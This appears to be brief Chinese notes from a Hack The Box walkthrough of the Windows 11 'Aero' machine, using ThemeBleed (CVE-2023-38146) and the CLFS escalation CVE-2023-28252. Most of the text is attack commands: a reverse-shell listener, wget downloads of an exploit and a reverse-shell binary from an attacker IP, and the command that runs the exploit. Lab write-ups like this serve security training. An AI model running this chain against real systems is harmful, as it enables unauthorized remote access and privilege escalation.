HTB-M-Aero

CVE-2023-28252+win11主题漏洞

显示win11的

如果是用Windows打的话

https://github.com/exploits-forsale/themebleed/releases/tag/v1

这还有Linux版本

https://github.com/Jnnshschl/CVE-2023-38146/tree/main

这个是themebleed.exe的python版本

python themebleed.py -r 10.10.16.14 -p 4444
执行生成+监听

rlwrap -cAr nc -lvnp 4444
美化shell监听

获得第一个shell

tree /f .
用来查看文件

CVE-2023-28252

https://github.com/duck-sec/CVE-2023-28252-Compiled-exe

msf生成个反弹shell —-rev.exe

wget http://10.10.16.14/CVE-2023-28252-Compiled-exe/exploit.exe -Outfile C:\Users\sam.emerson\Downloads\exploit.exe

wget http://10.10.16.14/revshell.exe -Outfile C:\Users\sam.emerson\Downloads\rev.exe

.\exploit.exe 1208 1 .\rev.exe

参考

• https://gunzf0x.github.io/pentesting/es/posts/aero/
• https://infosecwriteups.com/aero-htb-windows-11-rce-privesc-themebleed-clfs-36e0379d5e68
• https://0xdf.gitlab.io/2023/09/28/htb-aero.html